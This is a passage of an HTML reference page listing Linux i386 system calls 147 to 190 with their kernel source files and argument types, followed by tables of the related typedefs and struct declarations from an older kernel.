long</td><td>-</td><td>-</td></tr><tr><td>147</td><td>sys_getsid</td><td><a href="">kernel/sys.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#pid_t">pid_t</a></td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>148</td><td>sys_fdatasync</td><td><a href="">fs/buffer.c</a></td> <td>unsigned int</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>149</td><td>sys_sysctl</td><td><a href="">kernel/sysctl.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#__sysctl_args">struct __sysctl_args *</a></td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>150</td><td>sys_mlock</td><td><a href="">mm/mlock.c</a></td> <td>unsigned long</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#size_t">size_t</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>151</td><td>sys_munlock</td><td><a href="">mm/mlock.c</a></td> <td>unsigned long</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#size_t">size_t</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>152</td><td>sys_mlockall</td><td><a href="">mm/mlock.c</a></td> <td>int</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>153</td><td>sys_munlockall</td><td><a href="">mm/mlock.c</a></td> <td>-</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>154</td><td>sys_sched_setparam</td><td><a href="">kernel/sched.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#pid_t">pid_t</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#sched_param">struct sched_param *</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>155</td><td>sys_sched_getparam</td><td><a href="">kernel/sched.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#pid_t">pid_t</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#sched_param">struct sched_param *</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>156</td><td>sys_sched_setscheduler</td><td><a href="">kernel/sched.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#pid_t">pid_t</a></td><td>int</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#sched_param">struct sched_param *</a></td><td>-</td><td>-</td></tr><tr><td>157</td><td>sys_sched_getscheduler</td><td><a href="">kernel/sched.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#pid_t">pid_t</a></td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>158</td><td>sys_sched_yield</td><td><a href="">kernel/sched.c</a></td> <td>-</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>159</td><td>sys_sched_get_priority_max</td><td><a href="">kernel/sched.c</a></td> <td>int</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>160</td><td>sys_sched_get_priority_min</td><td><a href="">kernel/sched.c</a></td> <td>int</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>161</td><td>sys_sched_rr_get_interval</td><td><a href="">kernel/sched.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#pid_t">pid_t</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#timespec">struct timespec *</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>162</td><td>sys_nanosleep</td><td><a href="">kernel/sched.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#timespec">struct timespec *</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#timespec">struct timespec *</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>163</td><td>sys_mremap</td><td><a href="">mm/mremap.c</a></td> <td>unsigned long</td><td>unsigned long</td><td>unsigned long</td><td>unsigned long</td><td>-</td></tr><tr><td>164</td><td>sys_setresuid</td><td><a href="">kernel/sys.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#uid_t">uid_t</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#uid_t">uid_t</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#uid_t">uid_t</a></td><td>-</td><td>-</td></tr><tr><td>165</td><td>sys_getresuid</td><td><a href="">kernel/sys.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#uid_t">uid_t *</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#uid_t">uid_t *</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#uid_t">uid_t *</a></td><td>-</td><td>-</td></tr><tr><td>166</td><td>sys_vm86</td><td><a href="">arch/i386/kernel/vm86.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#vm86_struct">struct vm86_struct *</a></td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>167</td><td>sys_query_module</td><td><a href="">kernel/module.c</a></td> <td>const char *</td><td>int</td><td>char *</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#size_t">size_t</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#size_t">size_t *</a></td></tr><tr><td>168</td><td>sys_poll</td><td><a href="">fs/select.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#pollfd">struct pollfd *</a></td><td>unsigned int</td><td>long</td><td>-</td><td>-</td></tr><tr><td>169</td><td>sys_nfsservctl</td><td><a href="">fs/filesystems.c</a></td> <td>int</td><td>void *</td><td>void *</td><td>-</td><td>-</td></tr><tr><td>170</td><td>sys_setresgid</td><td><a href="">kernel/sys.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#gid_t">gid_t</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#gid_t">gid_t</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#gid_t">gid_t</a></td><td>-</td><td>-</td></tr><tr><td>171</td><td>sys_getresgid</td><td><a href="">kernel/sys.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#gid_t">gid_t *</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#gid_t">gid_t *</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#gid_t">gid_t *</a></td><td>-</td><td>-</td></tr><tr><td>172</td><td>sys_prctl</td><td><a href="">kernel/sys.c</a></td> <td>int</td><td>unsigned long</td><td>unsigned long</td><td>unsigned long</td><td>unsigned long</td></tr><tr><td>173</td><td>sys_rt_sigreturn</td><td><a href="">arch/i386/kernel/signal.c</a></td> <td>unsigned long</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>174</td><td>sys_rt_sigaction</td><td><a href="">kernel/signal.c</a></td> <td>int</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#sigaction">const struct sigaction *</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#sigaction">struct sigaction *</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#size_t">size_t</a></td><td>-</td></tr><tr><td>175</td><td>sys_rt_sigprocmask</td><td><a href="">kernel/signal.c</a></td> <td>int</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#sigset_t">sigset_t *</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#sigset_t">sigset_t *</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#size_t">size_t</a></td><td>-</td></tr><tr><td>176</td><td>sys_rt_sigpending</td><td><a href="">kernel/signal.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#sigset_t">sigset_t *</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#size_t">size_t</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>177</td><td>sys_rt_sigtimedwait</td><td><a href="">kernel/signal.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#sigset_t">const sigset_t *</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#siginfo_t">siginfo_t *</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#timespec">const struct timespec *</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#size_t">size_t</a></td><td>-</td></tr><tr><td>178</td><td>sys_rt_sigqueueinfo</td><td><a href="">kernel/signal.c</a></td> <td>int</td><td>int</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#siginfo_t">siginfo_t *</a></td><td>-</td><td>-</td></tr><tr><td>179</td><td>sys_rt_sigsuspend</td><td><a href="">arch/i386/kernel/signal.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#sigset_t">sigset_t *</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#size_t">size_t</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>180</td><td>sys_pread</td><td><a href="">fs/read_write.c</a></td> <td>unsigned int</td><td>char *</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#size_t">size_t</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#loff_t">loff_t</a></td><td>-</td></tr><tr><td>181</td><td>sys_pwrite</td><td><a href="">fs/read_write.c</a></td> <td>unsigned int</td><td>const char *</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#size_t">size_t</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#loff_t">loff_t</a></td><td>-</td></tr><tr><td>182</td><td>sys_chown</td><td><a href="">fs/open.c</a></td> <td>const char *</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#uid_t">uid_t</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#gid_t">gid_t</a></td><td>-</td><td>-</td></tr><tr><td>183</td><td>sys_getcwd</td><td><a href="">fs/dcache.c</a></td> <td>char *</td><td>unsigned long</td><td>-</td><td>-</td><td>-</td></tr><tr><td>184</td><td>sys_capget</td><td><a href="">kernel/capability.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#cap_user_header_t">cap_user_header_t</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#cap_user_data_t">cap_user_data_t</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>185</td><td>sys_capset</td><td><a href="">kernel/capability.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#cap_user_header_t">cap_user_header_t</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#cap_user_data_t">const cap_user_data_t</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>186</td><td>sys_sigaltstack</td><td><a href="">arch/i386/kernel/signal.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#stack_t">const stack_t *</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#stack_t">stack_t *</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>187</td><td>sys_sendfile</td><td><a href="">mm/filemap.c</a></td> <td>int</td><td>int</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#off_t">off_t *</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#size_t">size_t</a></td><td>-</td></tr><tr><td>190</td><td>sys_vfork</td><td><a href="">arch/i386/kernel/process.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#pt_regs">struct pt_regs</a></td><td>-</td><td>-</td><td>-</td><td>-</td></tr></tbody></table><a href="" name="note117"><b>Note for sys_ipc</b> (117)</a>: this syscall takes six arguments, so it can't fit into the five registers %ebx - %edi; the last parameter (not shown) is of type 'long'. This syscall requires a special call method where a pointer is put in %ebx which points to an array containing the six arguments. <br />I will now explain exactly where in the kernel source that I got the information in the table above. I do this because 1) changes in the source are bound to happen, 2) you might be curious, or 3) I might've made an error. <br /><h2>System Call Numbers</h2>For the numbers of the syscalls, look in <a href="">arch/i386/kernel/entry.S</a> for <strong>sys_call_table</strong>. The syscall numbers are offsets into that table. Several spots in the table are occupied by the syscall <strong>sys_ni_syscall</strong>. This is a placeholder that either replaces an obsolete syscall or reserves a spot for future syscalls. <br />Incidentally, the system calls are called from the function <strong>system_call</strong> in the same file; in particular, they are called with the assembly instruction 'call *SYMBOL_NAME(sys_call_table)(,%eax,4)'. The part '*SYMBOL_NAME(sys_call_table)' just gets replaced by a symbol name in <strong>sys_call_table</strong>. <strong>SYMBOL_NAME</strong> is a macro defined in <a href="http://world.std.com/usr/src/linux/include/linux/linkage.h">include/linux/linkage.h</a>, and it just replaces itself with its argument. <br /><h2>Typedefs</h2>Here are the typedef declarations in the prototypes above:<br /><table border="1"><tbody><tr><th valign="top"><a href="" name="atomic_t">atomic_t</a></th> <td> <a href="">include/asm/atomic.h</a>:<br />#ifdef __SMP__<br />typedef struct { volatile int counter; } atomic_t;<br />#else<br />typedef struct { int counter; } atomic_t;<br />#endif </td> </tr><tr><th valign="top"><a href="" name="caddr_t">caddr_t</a></th> <td> <a href="">include/asm/posix_types.h</a>:typedef char * __kernel_caddr_t;<br /><a href="">include/linux/types.h</a>:typedef __kernel_caddr_t caddr_t; </td> </tr><tr><th valign="top"><a href="" name="cap_user_header_t">cap_user_header_t</a></th> <td> <a href="">include/linux/capability.h</a>:<br />typedef struct __user_cap_header_struct {<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#__u32">__u32</a> version;<br /> int pid;<br />} *cap_user_header_t; </td> </tr><tr><th valign="top"><a href="" name="cap_user_data_t">cap_user_data_t</a></th> <td> <a href="">include/linux/capability.h</a>:<br />typedef struct __user_cap_data_struct {<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#__u32">__u32</a> effective;<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#__u32">__u32</a> permitted;<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#__u32">__u32</a> inheritable;<br />} *cap_user_data_t; </td> </tr><tr><th valign="top"><a href="" name="clock_t">clock_t</a></th> <td> <a href="">include/asm/posix_types.h</a>:typedef long __kernel_clock_t;<br /><a href="">include/linux/types.h</a>:typedef __kernel_clock_t clock_t; </td> </tr><tr><th valign="top"><a href="" name="dev_t">dev_t</a></th> <td> <a href="">include/asm/posix_types.h</a>:typedef unsigned short __kernel_dev_t;<br /><a href="">include/linux/types.h</a>:typedef __kernel_dev_t dev_t; </td> </tr><tr><th valign="top"><a href="" name="fdset">fdset</a></th> <td> include/linux/posix_types.h<br />#define __FD_SETSIZE 1024<br />#define __NFDBITS (8 * sizeof(unsigned long))<br />#define __FDSET_LONGS (__FD_SETSIZE/__NFDBITS)<br />(==> __FDSET_LONGS == 32)<br /><br />typedef struct {<br /> unsigned long fds_bits [__FDSET_LONGS];<br />} __kernel_fd_set;<br /><a href="">include/linux/types.h</a>:typedef __kernel_fd_set fd_set;<br /></td> </tr><tr><th valign="top"><a href="" name="gid_t">gid_t</a></th> <td> <a href="">include/asm/posix_types.h</a>:typedef unsigned short __kernel_gid_t;<br /><a href="">include/linux/types.h</a>:typedef __kernel_gid_t gid_t; </td> </tr><tr><th valign="top"><a href="" name="__kernel_daddr_t">__kernel_daddr_t</a></th> <td> <a href="">include/asm/posix_types.h</a>:typedef int __kernel_daddr_t;<br /></td> </tr><tr><th valign="top"><a href="" name="__kernel_fsid_t">__kernel_fsid_t</a></th> <td> <a href="">include/asm/posix_types.h</a>:<br />typedef struct {<br /> int __val[2];<br />} __kernel_fsid_t;<br /><br /></td> </tr><tr><th valign="top"><a href="" name="__kernel_ino_t">__kernel_ino_t</a></th> <td> <a href="">include/asm/posix_types.h</a>:typedef unsigned long __kernel_ino_t;<br /></td> </tr><tr><th valign="top"><a href="" name="__kernel_size_t">__kernel_size_t</a></th> <td> <a href="">include/asm/posix_types.h</a>:typedef unsigned int __kernel_size_t; </td> </tr><tr><th valign="top"><a href="" name="loff_t">loff_t</a></th> <td> <a href="">include/asm/posix_types.h</a>:typedef long long __kernel_loff_t;<br /><a href="">include/linux/types.h</a>:typedef __kernel_loff_t loff_t; </td> </tr><tr><th valign="top"><a href="" name="mode_t">mode_t</a></th> <td> <a href="">include/asm/posix_types.h</a>:typedef unsigned short __kernel_mode_t;<br /><a href="">include/linux/types.h</a>:typedef __kernel_mode_t mode_t; </td> </tr><tr><th valign="top"><a href="" name="off_t">off_t</a></th> <td> <a href="">include/asm/posix_types.h</a>:typedef long __kernel_off_t; <a href="">include/linux/types.h</a>:typedef __kernel_off_t off_t; </td> </tr><tr><th valign="top"><a href="" name="old_sigset_t">old_sigset_t</a></th> <td> <a href="">include/asm/signal.h</a>:typedef unsigned long old_sigset_t; </td> </tr><tr><th valign="top"><a href="" name="pid_t">pid_t</a></th> <td> <a href="">include/asm/posix_types.h</a>:typedef int __kernel_pid_t;<br /><a href="">include/linux/types.h</a>:typedef __kernel_pid_t pid_t; </td> </tr><tr><th valign="top"><a href="" name="__sighandler_t">__sighandler_t</a></th> <td> <a href="">include/asm/signal.h</a>:typedef void (*__sighandler_t)(int); </td> </tr><tr><th valign="top"><a href="" name="siginfo_t">siginfo_t</a></th> <td> <a href="">include/asm/siginfo.h</a>:<br />#define SI_MAX_SIZE 128<br />#define SI_PAD_SIZE ((SI_MAX_SIZE/sizeof(int)) - 3)<br />(==> SI_PAD_SIZE == 29)<br /><br />typedef struct siginfo {<br /> int si_signo;<br /> int si_errno;<br /> int si_code;<br /><br /> union {<br /> int _pad[SI_PAD_SIZE];<br /><br /> /* kill() */<br /> struct {<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#pid_t">pid_t</a> _pid; /* sender's pid */<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#uid_t">uid_t</a> _uid; /* sender's uid */<br /> } _kill;<br /><br /> /* POSIX.1b timers */<br /> struct {<br /> unsigned int _timer1;<br /> unsigned int _timer2;<br /> } _timer;<br /><br /> /* POSIX.1b signals */<br /> struct {<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#pid_t">pid_t</a> _pid; /* sender's pid */<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#uid_t">uid_t</a> _uid; /* sender's uid */<br /> sigval_t _sigval;<br /> } _rt;<br /><br /> /* SIGCHLD */<br /> struct {<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#pid_t">pid_t</a> _pid; /* which child */<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#uid_t">uid_t</a> _uid; /* sender's uid */<br /> int _status; /* exit code */<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#clock_t">clock_t</a> _utime;<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#clock_t">clock_t</a> _stime;<br /> } _sigchld;<br /><br /> /* SIGILL, SIGFPE, SIGSEGV, SIGBUS */<br /> struct {<br /> void *_addr; /* faulting insn/memory ref. */<br /> } _sigfault;<br /><br /> /* SIGPOLL */<br /> struct {<br /> int _band; /* POLL_IN, POLL_OUT, POLL_MSG */<br /> int _fd;<br /> } _sigpoll;<br /> } _sifields;<br />} siginfo_t; </td> </tr><tr><th valign="top"><a href="" name="sigset_t">sigset_t</a></th> <td> <a href="">include/asm/signal.h</a>:typedef unsigned long sigset_t; </td> </tr><tr><th valign="top"><a href="" name="size_t">size_t</a></th> <td> <a href="">include/asm/posix_types.h</a>:typedef unsigned int __kernel_size_t;<br /><a href="">include/linux/types.h</a>:typedef __kernel_size_t size_t; </td> </tr><tr><th valign="top"><a href="" name="ssize_t">ssize_t</a></th> <td> <a href="">include/asm/posix_types.h</a>:typedef int __kernel_ssize_t;<br /><a href="">include/linux/types.h</a>:typedef __kernel_ssize_t ssize_t; </td> </tr><tr><th valign="top"><a href="" name="stack_t">stack_t</a></th> <td> <a href="">include/asm/signal.h</a>:<br />typedef struct sigaltstack {<br /> void *ss_sp;<br /> int ss_flags;<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#size_t">size_t</a> ss_size;<br />} stack_t; </td> </tr><tr><th valign="top"><a href="" name="suseconds_t">suseconds_t</a></th> <td> <a href="">include/asm/posix_types.h</a>:typedef long __kernel_suseconds_t;<br /><a href="">include/linux/types.h</a>:typedef __kernel_suseconds_t suseconds_t;<br /></td> </tr><tr><th valign="top"><a href="" name="time_t">time_t</a></th> <td> <a href="">include/asm/posix_types.h</a>:typedef long __kernel_time_t; <a href="">include/linux/types.h</a>:typedef __kernel_time_t time_t;<br /></td> </tr><tr><th valign="top"><a href="" name="uid_t">uid_t</a></th> <td> <a href="">include/asm/posix_types.h</a>:typedef unsigned short __kernel_uid_t;<br /><a href="">include/linux/types.h</a>:typedef __kernel_uid_t uid_t; </td> </tr><tr><th valign="top"><a href="" name="uint">uint</a></th> <td> <a href="">include/linux/types.h</a>:typedef unsigned int uint; </td> </tr><tr><th valign="top"><a href="" name="__u32">__u32</a></th> <td> <a href="">include/asm/types.h</a>:typedef unsigned int __u32; </td> </tr></tbody></table><br /><h2>Struct Declarations</h2>Here are the struct declarations for the table at the top:<br /><table border="1"><tbody><tr><th valign="top"><a href="" name="exception_table_entry">exception_table_entry</a></th> <td> <a href="">include/linux/module.h</a>:<br />struct exception_table_entry {<br /> unsigned long insn, fixup;<br />}; </td> </tr><tr><th valign="top"><a href="" name="iovec">iovec</a></th> <td> <a href="">include/linux/uio.h</a>:<br />struct iovec {<br /> void *iov_base;<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#__kernel_size_t">__kernel_size_t</a> iov_len; }; </td> </tr><tr><th valign="top"><a href="" name="itimerval">itimerval</a></th> <td> <a href="">include/linux/time.h</a>:<br />struct itimerval {<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#timeval">struct timeval</a> it_interval; /* timer interval */<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#timeval">struct timeval</a> it_value; /* current value */<br />}; </td> </tr><tr><th valign="top"><a href="" name="kernel_sym">kernel_sym</a></th> <td> <a href="">include/linux/module.h</a>:<br />struct kernel_sym {<br /> unsigned long value;<br /> char name[60];<br />}; </td> </tr><tr><th valign="top"><a href="" name="mmap_arg_struct">mmap_arg_struct</a></th> <td> <a href="">arch/i386/kernel/sys_i386.c</a>:<br />struct mmap_arg_struct {<br /> unsigned long addr;<br /> unsigned long len;<br /> unsigned long prot;<br /> unsigned long flags;<br /> unsigned long fd;<br /> unsigned long offset;<br />}; </td> </tr><tr><th valign="top"><a href="" name="module">module</a></th> <td> <a href="">include/linux/module.h</a>:<br />struct module {<br /> unsigned long size_of_struct; /* sizeof(module) */<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#module">struct module</a> *next;<br /> const char *name;<br /> unsigned long size;<br /> union {<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#atomic_t">atomic_t</a> usecount;<br /> long pad;<br /> } uc;<br /> unsigned long flags; /* AUTOCLEAN et al */<br /> unsigned nsyms;<br /> unsigned ndeps;<br /><br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#module_symbol">struct module_symbol</a> *syms;<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#module_ref">struct module_ref</a> *deps;<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#module_ref">struct module_ref</a> *refs;<br /> int (*init)(void);<br /> void (*cleanup)(void);<br /> const <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#exception_table_entry">struct exception_table_entry</a> *ex_table_start;<br /> const <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#exception_table_entry">struct exception_table_entry</a> *ex_table_end;<br />/* Members past this point are extensions to the basic<br />module support and are optional. Use mod_opt_member()<br />to examine them. */<br /> const <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#module_persist">struct module_persist</a> *persist_start;<br /> const <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#module_persist">struct module_persist</a> *persist_end;<br /> int (*can_unload)(void);<br />}; </td> </tr><tr><th valign="top"><a href="" name="module_persist">module_persist</a></th> <td> <a href="">include/linux/module.h</a>:<br />struct module_persist; /* yes, it's empty */ </td> </tr><tr><th valign="top"><a href="" name="module_ref">module_ref</a></th> <td> <a href="">include/linux/module.h</a>:<br />struct module_ref {<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#module">struct module</a> *dep; /* "parent" pointer */<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#module">struct module</a> *ref; /* "child" pointer */<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#module_ref">struct module_ref</a> *next_ref;<br />}; </td> </tr><tr><th valign="top"><a href="" name="module_symbol">module_symbol</a></th> <td> <a href="">include/linux/module.h</a>:<br />struct module_symbol {<br /> unsigned long value;<br /> const char *name;<br />}; </td> </tr><tr><th valign="top"><a href="" name="new_utsname">new_utsname</a></th> <td> <a href="">include/linux/utsname.h</a>:<br />struct new_utsname {<br /> char sysname[65];<br /> char nodename[65];<br /> char release[65];<br /> char version[65];<br /> char machine[65];<br /> char domainname[65];<br />}; </td> </tr><tr><th valign="top"><a href="" name="__old_kernel_stat">__old_kernel_stat</a></th> <td> <a href="">include/asm/stat.h</a>:<br />struct __old_kernel_stat {<br /> unsigned short st_dev;<br /> unsigned short st_ino;<br /> unsigned short st_mode;<br /> unsigned short st_nlink;<br /> unsigned short st_uid;<br /> unsigned short st_gid;<br /> unsigned short st_rdev;<br /> unsigned long st_size;<br /> unsigned long st_atime;<br /> unsigned long st_mtime;<br /> unsigned long st_ctime;<br />}; </td> </tr><tr><th valign="top"><a href="" name="oldold_utsname">oldold_utsname</a></th> <td> <a href="">include/linux/utsname.h</a>:<br />struct oldold_utsname {<br /> char sysname[9];<br /> char nodename[9];<br /> char release[9];<br /> char version[9];<br /> char machine[9];<br />}; </td> </tr><tr><th valign="top"><a href="" name="old_sigaction">old_sigaction</a></th> <td> <a href="">include/asm/signal.h</a>:<br />struct old_sigaction {<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#__sighandler_t">__sighandler_t</a> sa_handler;<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#old_sigset_t">old_sigset_t</a> sa_mask;<br /> unsigned long sa_flags;<br /> void (*sa_restorer)(void);<br />}; </td> </tr><tr><th valign="top"><a href="" name="old_utsname">old_utsname</a></th> <td> <a href="">include/linux/utsname.h</a>:<br />struct old_utsname {<br /> char sysname[65];<br /> char nodename[65];<br /> char release[65];<br /> char version[65];<br /> char machine[65];<br />}; </td> </tr><tr><th valign="top"><a href="" name="pollfd">pollfd</a></th> <td> <a href="">include/asm/poll.h</a>:<br />struct pollfd {<br /> int fd;<br /> short events;<br /> short revents;<br />}; </td> </tr><tr><th valign="top"><a href="" name="pt_regs">pt_regs</a></th> <td> <a href="">include/asm/ptrace.h</a>:<br />struct pt_regs {<br /> long ebx;<br /> long ecx;<br /> long edx;<br /> long esi;<br /> long edi;<br /> long ebp;<br /> long eax;<br /> int xds;<br /> int xes;<br /> long orig_eax;<br /> long eip;<br /> int xcs;<br /> long eflags;<br /> long esp;<br /> int xss;<br />}; </td> </tr><tr><th valign="top"><a href="" name="revectored_struct">revectored_struct</a></th> <td> <a href="">include/asm/vm86.h</a>:<br />struct revectored_struct {<br /> unsigned long __map[8];<br />};<br /></td> </tr><tr><th valign="top"><a href="" name="rlimit">rlimit</a></th> <td> <a href="">include/linux/resource.h</a>:<br />struct rlimit {<br /> long rlim_cur;<br /> long rlim_max;<br />}; </td> </tr><tr><th valign="top"><a href="" name="rusage">rusage</a></th> <td> <a href="">include/linux/resource.h</a>:<br />struct rusage {<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#timeval">struct timeval</a> ru_utime; /* user time used */<br /> <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#timeval">struct timeval</a> ru_stime; /* system time used */<br /> long ru_maxrss; /* maximum resident set size */<br /> long ru_ixrss; /* integral shared memory size */<br /> long ru_idrss; /* integral unshared data size */<br /> long ru_isrss; /* integral unshared stack size */<br /> long ru_minflt; /* page reclaims */<br /> long ru_majflt; /* page faults */<br /> long ru_nswap; /* swaps */<br /> long ru_inblock; /* block input operations */<br /> long ru_oublock; /* block output operations */<br /> long 